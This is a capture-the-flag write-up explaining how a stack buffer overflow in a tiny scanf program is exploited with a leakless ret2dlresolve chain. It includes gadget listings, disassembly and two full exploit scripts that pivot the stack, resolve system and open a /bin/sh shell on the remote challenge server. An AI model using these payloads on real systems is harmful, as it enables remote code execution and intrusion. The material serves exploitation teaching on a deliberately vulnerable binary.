BOF that's too ez

15 minutes to read

We are given a 64-bit binary called chall_patched:

Arch:       amd64-64-little
RELRO:      Partial RELRO
Stack:      No canary found
NX:         NX enabled
PIE:        No PIE (0x3fe000)
RUNPATH:    b'.'
SHSTK:      Enabled
IBT:        Enabled
Stripped:   No

We also have the Glibc library and loader. We are dealing with version 2.36:

$ ./ld-linux-x86-64.so.2 ./libc.so.6
GNU C Library (Debian GLIBC 2.36-9) stable release version 2.36.
Copyright (C) 2022 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
Compiled by GNU CC version 12.2.0.
libc ABIs: UNIQUE IFUNC ABSOLUTE
Minimum supported kernel: 3.2.0
For bug reporting instructions, please see:
<http://www.debian.org/Bugs/>.

Source code analysis

This time we also have the source code. And, to be honest, there is not much to say about it:

// gcc main.c -fno-stack-protector -fno-pic -no-pie -o chall
#include <stdio.h>

__attribute__( ( constructor ) ) void init() {
  setvbuf( stdin, NULL, _IONBF, NULL );
  setvbuf( stdout, NULL, _IONBF, NULL );
  setvbuf( stderr, NULL, _IONBF, NULL );
}

int main( void ) {
  char buf[0x10] = { 0 };
  scanf( "%s", buf );
  return 0;
}

So, we have a clear Buffer Overflow vulnerability because the buffer data has only 16 bytes reserved, but scanf("%s", data) will not check bounds and simply write until it finds a newline character or a whitespace.

Exploitation

So, Buffer Overflow. Easy, right? Not quite because we have plenty of limitations. For instance, we would like to use Return-Oriented Programming (ROP) because the NX doesn’t allow us to execute shellcode on the stack. However, we have only a few usable ROP gadgets:

$ ROPgadget --binary chall_patched
Gadgets information
============================================================
0x00000000004010cb : add bh, bh ; loopne 0x401135 ; nop ; ret
0x000000000040109c : add byte ptr [rax], al ; add byte ptr [rax], al ; endbr64 ; ret
0x0000000000401035 : add byte ptr [rax], al ; add byte ptr [rax], al ; jmp 0x401020
0x00000000004011ee : add byte ptr [rax], al ; add byte ptr [rax], al ; leave ; ret
0x00000000004011ef : add byte ptr [rax], al ; add cl, cl ; ret
0x000000000040113a : add byte ptr [rax], al ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x000000000040109e : add byte ptr [rax], al ; endbr64 ; ret
0x0000000000401037 : add byte ptr [rax], al ; jmp 0x401020
0x00000000004011f0 : add byte ptr [rax], al ; leave ; ret
0x000000000040100d : add byte ptr [rax], al ; test rax, rax ; je 0x401016 ; call rax
0x000000000040113b : add byte ptr [rcx], al ; pop rbp ; ret
0x00000000004011f1 : add cl, cl ; ret
0x00000000004010ca : add dil, dil ; loopne 0x401135 ; nop ; ret
0x0000000000401045 : add dword ptr [rax], eax ; add byte ptr [rax], al ; jmp 0x401020
0x000000000040113c : add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x0000000000401137 : add eax, 0x2f0b ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x0000000000401017 : add esp, 8 ; ret
0x0000000000401016 : add rsp, 8 ; ret
0x00000000004010c8 : and byte ptr [rax + 0x40], al ; add bh, bh ; loopne 0x401135 ; nop ; ret
0x00000000004011b7 : call qword ptr [rax + 0xff3c35d]
0x0000000000401014 : call rax
0x0000000000401153 : cli ; jmp 0x4010e0
0x0000000000401033 : cli ; push 0 ; jmp 0x401020
0x0000000000401043 : cli ; push 1 ; jmp 0x401020
0x00000000004010a3 : cli ; ret
0x00000000004011f7 : cli ; sub rsp, 8 ; add rsp, 8 ; ret
0x0000000000401150 : endbr64 ; jmp 0x4010e0
0x0000000000401030 : endbr64 ; push 0 ; jmp 0x401020
0x0000000000401040 : endbr64 ; push 1 ; jmp 0x401020
0x00000000004010a0 : endbr64 ; ret
0x0000000000401012 : je 0x401016 ; call rax
0x00000000004010c5 : je 0x4010d0 ; mov edi, 0x404020 ; jmp rax
0x0000000000401107 : je 0x401110 ; mov edi, 0x404020 ; jmp rax
0x0000000000401039 : jmp 0x401020
0x0000000000401154 : jmp 0x4010e0
0x000000000040103d : jmp qword ptr [rsi - 0x70]
0x00000000004010cc : jmp rax
0x00000000004011f2 : leave ; ret
0x00000000004010cd : loopne 0x401135 ; nop ; ret
0x0000000000401136 : mov byte ptr [rip + 0x2f0b], 1 ; pop rbp ; ret
0x00000000004011ed : mov eax, 0 ; leave ; ret
0x00000000004010c7 : mov edi, 0x404020 ; jmp rax
0x00000000004011b8 : nop ; pop rbp ; ret
0x00000000004010cf : nop ; ret
0x000000000040114c : nop dword ptr [rax] ; endbr64 ; jmp 0x4010e0
0x00000000004010c6 : or dword ptr [rdi + 0x404020], edi ; jmp rax
0x0000000000401138 : or ebp, dword ptr [rdi] ; add byte ptr [rax], al ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x000000000040113d : pop rbp ; ret
0x0000000000401034 : push 0 ; jmp 0x401020
0x0000000000401044 : push 1 ; jmp 0x401020
0x000000000040101a : ret
0x0000000000401161 : retf
0x0000000000401022 : retf 0x2f
0x0000000000401011 : sal byte ptr [rdx + rax - 1], 0xd0 ; add rsp, 8 ; ret
0x000000000040100b : shr dword ptr [rdi], 1 ; add byte ptr [rax], al ; test rax, rax ; je 0x401016 ; call rax
0x00000000004011f9 : sub esp, 8 ; add rsp, 8 ; ret
0x00000000004011f8 : sub rsp, 8 ; add rsp, 8 ; ret
0x0000000000401010 : test eax, eax ; je 0x401016 ; call rax
0x00000000004010c3 : test eax, eax ; je 0x4010d0 ; mov edi, 0x404020 ; jmp rax
0x0000000000401105 : test eax, eax ; je 0x401110 ; mov edi, 0x404020 ; jmp rax
0x000000000040100f : test rax, rax ; je 0x401016 ; call rax

Unique gadgets found: 61

ROP gadgets

I’ll highlight those that can be useful:

0x000000000040113c : add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x0000000000401039 : jmp 0x401020
0x00000000004011f2 : leave ; ret
0x00000000004010c7 : mov edi, 0x404020 ; jmp rax
0x000000000040113d : pop rbp ; ret
0x000000000040101a : ret

See? We don’t have the classic pop rdi; ret gadget. We can’t even control the content of $rdi, we are forced to use 0x404020!

Also notice that we can only set arbitrary values in $rbp. Well, we can also control $rsp because the leave instruction is just mov rsp, rbp; pop rbp.

Hence, the first gadget could be really useful if we can control $rbx, because we would get a kind of write-what-where primitive. But it looks hard to control $rbx.

Looking to the assembly code, I found some other instructions that can be really handy:

00000000004011bb <main>:
  4011bb:       f3 0f 1e fa             endbr64
  ...
  4011d7:       48 8d 45 f0             lea    rax,[rbp-0x10]
  4011db:       48 89 c6                mov    rsi,rax
  4011de:       bf 04 20 40 00          mov    edi,0x402004
  4011e3:       b8 00 00 00 00          mov    eax,0x0
  4011e8:       e8 73 fe ff ff          call   401060 <_init+0x60>
  4011ed:       b8 00 00 00 00          mov    eax,0x0
  4011f2:       c9                      leave
  4011f3:       c3                      ret

With this section of main, we can control $rax and therefore $rsi, before calling scanf. Notice that $rax = 0 afterwards, so we don’t end up with $rax control. Also, while debugging, it looks like scanf sets some value to $rsi we can’t control properly, so it is also useless.

But the relevant thing is that we can control where to write with scanf! That is, we write to the address at $rbp + 0x10. But be careful, because the leave; ret will cause a Stack Pivot!

The init function also contains useful instructions:

0000000000401156 <init>:
  401156:       f3 0f 1e fa             endbr64
  ...
  40119a:       48 8b 05 9f 2e 00 00    mov    rax,QWORD PTR [rip+0x2e9f]        # 404040 <stderr@GLIBC_2.2.5>
  4011a1:       b9 00 00 00 00          mov    ecx,0x0
  4011a6:       ba 02 00 00 00          mov    edx,0x2
  4011ab:       be 00 00 00 00          mov    esi,0x0
  4011b0:       48 89 c7                mov    rdi,rax
  4011b3:       e8 98 fe ff ff          call   401050 <_init+0x50>
  ...

This part corresponds to setvbuf(stderr, NULL, _IONBF, NULL). We can also find the equivalent with stdin (0x404030) and stdout (0x404020). Therefore, we can also choose $rdi to be 0x404040 or 0x404030.

Last but not least, these sections will be highly relevant for the exploit I came up with:

0000000000401020 <.plt>:
  401020:       ff 35 ca 2f 00 00       push   QWORD PTR [rip+0x2fca]        # 403ff0 <_GLOBAL_OFFSET_TABLE_+0x8>
  401026:       ff 25 cc 2f 00 00       jmp    QWORD PTR [rip+0x2fcc]        # 403ff8 <_GLOBAL_OFFSET_TABLE_+0x10>
  40102c:       0f 1f 40 00             nop    DWORD PTR [rax+0x0]
  401030:       f3 0f 1e fa             endbr64
  401034:       68 00 00 00 00          push   0x0
  401039:       e9 e2 ff ff ff          jmp    401020 <_init+0x20>
  40103e:       66 90                   xchg   ax,ax
  401040:       f3 0f 1e fa             endbr64
  401044:       68 01 00 00 00          push   0x1
  401049:       e9 d2 ff ff ff          jmp    401020 <_init+0x20>
  40104e:       66 90                   xchg   ax,ax

Disassembly of section .plt.sec:

0000000000401050 <.plt.sec>:
  401050:       f3 0f 1e fa             endbr64
  401054:       ff 25 a6 2f 00 00       jmp    QWORD PTR [rip+0x2fa6]        # 404000 <setvbuf@GLIBC_2.2.5>
  40105a:       66 0f 1f 44 00 00       nop    WORD PTR [rax+rax*1+0x0]
  401060:       f3 0f 1e fa             endbr64
  401064:       ff 25 9e 2f 00 00       jmp    QWORD PTR [rip+0x2f9e]        # 404008 <__isoc99_scanf@GLIBC_2.7>
  40106a:       66 0f 1f 44 00 00       nop    WORD PTR [rax+rax*1+0x0]

Also, notice that the only functions we can use are setvbuf and scanf. There is no function that prints information to stdout! Therefore, we must come up with a leakless exploit!

ret2dlresolve

Every time there are not many useful gadgets and we don’t see a way to leak memory addresses to bypass ASLR, we can rely on ret2dlresolve.

This technique abuses how dynamically-linked programs resolve external function addresses at runtime. With this technique, we can tell the program to resolve the address of system, so we don’t have to care about ASLR.

There are not many resources out there that explain this attack in depth, especially for the x86_64 architecture. I’ll link some of them here:

In brief, we need to fake some structures and craft offsets and indices so that the _dl_runtime_resolve routine is able to find the function name, resolve the expected function in Glibc and write its real address where we want to.

BOF that’s too ez 1

Source: https://syst3mfailure.io/ret2dl_resolve/

The above image perfectly shows the process of calling an external function, in the above example, read:

The main function calls read at the .plt section
The .plt section jumps directly to the .got.plt section
If the function is not resolved yet, the .got.plt holds an address back to the .plt
The program pushes the reloc_arg number and jumps to the default .plt stub
This stub pushes the link_map address and calls _dl_runtime_resolve

On this process, we can mess around with reloc_arg number, because it is passed to _dl_runtime_resolve on the stack. We will need to learn how they work in order to come up with a successful ret2dlresolve exploit.

There are three relevant sections used by the linker to resolve addresses:

JMPREL (.rela.plt) is a table of Elf64_Rel structures (size 0x18). Each structure contains r_offset, r_info and padding. Both of the attributes are relevant, because r_offset holds the address where the relocation address will be written to, and r_info will be used to locate the corresponding Elf64_Sym structure in DYNSYM.
DYNSYM (.dynsym) contains a table of Elf64_Sym structures (size 0x18). The relevant field of this structure is st_name, which contains the index of the symbol name in STRTAB.
STRTAB (.dynstr) is just a list of symbol names all together, separated by a null byte.

Implementation

Let’s jump directly into the ret2dlresolve exploit code:

align = lambda alignment, addr: addr + (- addr % alignment)

JMPREL = 0x4005e0  # .rela.plt section
SYMTAB = 0x3fe450  # .symtab section
STRTAB = 0x3fe510  # .strtab section

dlresolve_payload_addr = 0x404e00
symbol_name = b'system\0'

fake_strtab = dlresolve_payload_addr
fake_symtab = dlresolve_payload_addr + 0x10
fake_jmprel = dlresolve_payload_addr + 0x10 + 0x18

st_name = fake_strtab - STRTAB
st_value = 0
st_size = 0
st_info = 0
st_other = 0
st_shndx = 0

elf64_sym = p32(st_name) + p8(st_value) + p8(st_size) + p16(st_info) + p64(st_other) + p64(st_shndx)

index = align(0x18, fake_symtab - SYMTAB) // 0x18

r_offset = setvbuf_got_addr
r_info = (index << 32) | 7

elf64_rel = p64(r_offset) + p64(r_info) + p64(0)

reloc_arg = align(0x18, fake_jmprel - JMPREL) // 0x18

dlresolve_payload  = symbol_name.ljust(0x10, b'\0')
dlresolve_payload += elf64_sym
dlresolve_payload += elf64_rel

First of all, I define the align function in order to fit structures with a 0x18-byte alignment. Then I define the relevant sections according to the binary:

$ readelf --sections chall_patched | egrep "Name|.rela.plt|.dynsym|.dynstr"
  [Nr] Name              Type             Address           Offset
  [ 6] .dynsym           DYNSYM           00000000003fe450  00000450
  [ 7] .dynstr           STRTAB           00000000003fe510  00000510
  [12] .rela.plt         RELA             00000000004005e0  000025e0

After that, I choose the address where I will store the payload and the symbol I want to resolve:

dlresolve_payload_addr = 0x404e00
symbol_name = b'system\0'

With this, I can start crafting fake structures. But let’s go to the end for a second:

dlresolve_payload  = symbol_name.ljust(0x10, b'\0')
dlresolve_payload += elf64_sym
dlresolve_payload += elf64_rel

In short, the dlresolve_payload is just a fake STRTAB, a fake DYNSYM and a fake JMPREL. This payload will be located at dlresolve_payload_addr = 0x404e00 (in the .bss section, which is writable):

fake_strtab = dlresolve_payload_addr
fake_symtab = dlresolve_payload_addr + 0x10
fake_jmprel = dlresolve_payload_addr + 0x10 + 0x18

Now, we need to find a value for reloc_arg and the attributes of the fake structures.

First of all, the fake SYMTAB section, that contains an Elf64_Sym structure:

st_name = fake_strtab - STRTAB
st_value = 0
st_size = 0
st_info = 0
st_other = 0
st_shndx = 0

elf64_sym = p32(st_name) + p8(st_value) + p8(st_size) + p16(st_info) + p64(st_other) + p64(st_shndx)

There is an index computed from this address, as a distance between the legitimate and fake SYMTAB sections:

index = align(0x18, fake_symtab - SYMTAB) // 0x18

This index will be present at the r_info attribute of the fake Elf64_Rel structure, at the fake JMPREL section:

r_offset = setvbuf_got_addr
r_info = (index << 32) | 7

elf64_rel = p64(r_offset) + p64(r_info) + p64(0)

Finally, the reloc_arg number is computed as a distance between the legitimate and fake JMPREL sections:

reloc_arg = align(0x18, fake_jmprel - JMPREL) // 0x18

Did you notice that r_offset is set to the address of setvbuf at the GOT? Yes, we want the address of system to be written there. If so, we can call the address we saw earlier at the init function, in order to control $rdi into some address of 0x404020, 0x404030 and 0x404040. Therefore, we will need to write "/bin/sh\0" here.

Let’s write here some ROP gadget addresses and other addresses required for the exploit:

pop_rbp_ret_addr = 0x40113d
leave_ret_addr = 0x4011f2

jmp_plt_addr = 0x401039

setvbuf_got_addr = 0x404000
stderr_got_addr = 0x404040

bin_sh_addr = 0x404048

call_setvbuf_addr = 0x40119a

I don’t know how to explain this better than showing the code:

io = get_process()

stage1  = p64(pop_rbp_ret_addr)
stage1 += p64(stderr_got_addr + 0x10)
stage1 += p64(context.binary.sym.main + 28)

io.sendline(b'A' * 24 + stage1)

In this stage, we set the value of $rbp to the address of stderr (0x404040) plus 0x10. We do this because $rax will have the value of $rbp - 0x10, executed at *main+27 (lea rax, [rbp-0x10]). Hence, we will be running scanf at the address of stderr (0x404040).

stage2  = p64(pop_rbp_ret_addr)
stage2 += p64(dlresolve_payload_addr - 0x80 + 0x10)
stage2 += p64(leave_ret_addr)
stage2 += b'\0' * 0xd20
stage2 += p64(dlresolve_payload_addr - 0x80 + 0x10)
stage2 += p64(context.binary.sym.main + 28)

io.sendline(p64(bin_sh_addr) + b'/bin/sh\0' + b'\0' * 8 + stage2)

First of all, we will take advantage of the junk length to exploit the Buffer Overflow, to insert here the string "/bin/sh\0" and its address (before the string). We need this for the end, because setvbuf will be called on the address pointed to by stderr (that is, it is not 0x404040, but 0x404048 at this point).

The second stage will execute from here because at the end of main there is a leave; ret, so we are effectively performing a Stack Pivot. This means that $rsp now points to the .bss, specifically, to 0x404058. Now we do the same trick of setting $rbp to be able to write at a desired address with scanf.

We will start writing above dlresolve_payload_addr because we need the stack to be safe when doing the ret2dlresolve stuff. We are doing another leave; ret to rebase $rsp to the current value of $rbp (which is 0x70 bytes above dlresolve_payload_addr). This is the reason of the 0xd20-byte padding:

$ python3 -q
>>> hex((0x404e00 - 0x80 + 0x10) - (0x404040 + 0x30))
'0xd20'

After the padding, we enter again the address of dlresolve_payload_addr - 0x80 + 0x10 (to set it to $rbp with the leave; ret gadget) and then the address of main to call scanf controlling $rax and $rsi. The program flow will jump here again, so we will be able to write at this address our third stage:

stage3  = p64(jmp_plt_addr)
stage3 += p64(reloc_arg)
stage3 += p64(call_setvbuf_addr)
stage3 += b'\0' * 0x50
stage3 += dlresolve_payload

io.sendline(b'A' * 24 + stage3)

This last stage will write 0x18 bytes of Buffer Overflow junk and then the address of an instruction jmp 0x401020. We cannot use 0x401020 directly because 0x20 is a whitespace in hexadecimal, and scanf would stop reading. Then, we push the reloc_arg for the ret2dlresolve exploit. After that, we enter the address to set $rdi = 0x404040 and call setvbuf (this will happen after the relocation process).

Finally, we add some more padding to fit in 0x80 bytes (0x18 + 0x18 + 0x50) and write dlresolve_payload.

With all this, we will get a shell, both locally and on the local Docker container:

$ python3 solve_manual.py
[*] './chall_patched'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x3fe000)
    RUNPATH:    b'.'
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
[+] Starting local process './chall_patched': pid 3272010
[*] Switching to interactive mode
$ whoami
rocky

Using `pwntools`

If you noticed, the script is called solve_manual.py. That’s because I wrote another exploit called solve_pwntools.py that abstracts all the ret2dlresolve stuff. Here it is:

pop_rbp_ret_addr = 0x40113d
leave_ret_addr = 0x4011f2

bin_sh_addr = 0x404048

jmp_plt_addr = 0x401039

call_setvbuf_addr = 0x40119a

dlresolve = Ret2dlresolvePayload(
    context.binary,
    symbol='system',
    args=[],
    resolution_addr=context.binary.got.setvbuf,
)

io = get_process()

stage1  = p64(pop_rbp_ret_addr)
stage1 += p64(context.binary.got.stderr + 0x10)
stage1 += p64(context.binary.sym.main + 28)

io.sendline(b'A' * 24 + stage1)

stage2  = p64(pop_rbp_ret_addr)
stage2 += p64(dlresolve.data_addr - 0x80 + 0x10)
stage2 += p64(leave_ret_addr)
stage2 += b'\0' * 0xd20
stage2 += p64(dlresolve.data_addr - 0x80 + 0x10)
stage2 += p64(context.binary.sym.main + 28)

io.sendline(p64(bin_sh_addr) + b'/bin/sh\0' + b'\0' * 8 + stage2)

stage3  = p64(jmp_plt_addr)
stage3 += p64(dlresolve.reloc_index)
stage3 += p64(call_setvbuf_addr)
stage3 += b'\0' * 0x50
stage3 += dlresolve.payload

io.sendline(b'A' * 24 + stage3)

io.interactive()

Obviously, it is not as exciting as solve_manual.py, but it does look more friendly.

Flag

With any of the exploits, we can get a shell on the remote instance and capture the flag:

$ python3 solve_manual.py 0.cloud.chals.io 26418
[*] './chall_patched'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x3fe000)
    RUNPATH:    b'.'
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
[+] Opening connection to 0.cloud.chals.io on port 26418: Done
[*] Switching to interactive mode
$ cat /flag*
HackOn{th4t_w4s_4_fr33_BOF_4_y0u_6c6415857decc41b8d9366be69ab68cc}

The full exploits can be found in here: solve_manual.py and solve_pwntools.py.